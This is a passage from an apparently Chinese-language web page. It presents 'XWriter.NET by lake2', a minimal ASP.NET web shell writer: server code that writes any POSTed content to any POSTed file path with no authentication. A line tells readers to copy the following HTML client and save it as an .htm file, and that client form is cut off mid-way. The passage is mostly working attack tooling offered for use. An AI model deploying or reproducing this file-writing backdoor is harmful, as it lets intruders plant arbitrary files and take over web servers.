| dim mywrite as new streamwriter(request.form("path"), true, encoding.default) mywrite.write(request.form("content")) mywrite.close response.write("Done!") End Sub </script>以下是客户端,复制下来保存为htm文件: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=gb2312"> <title>XWriter.NET by lake2</title> </head> <body> <form name="form1" method="post" onSubmit="TwoSubmit(this);"> <div align="center">URL: 上一页 [1] [2] [3] [4] [5] 下一页 |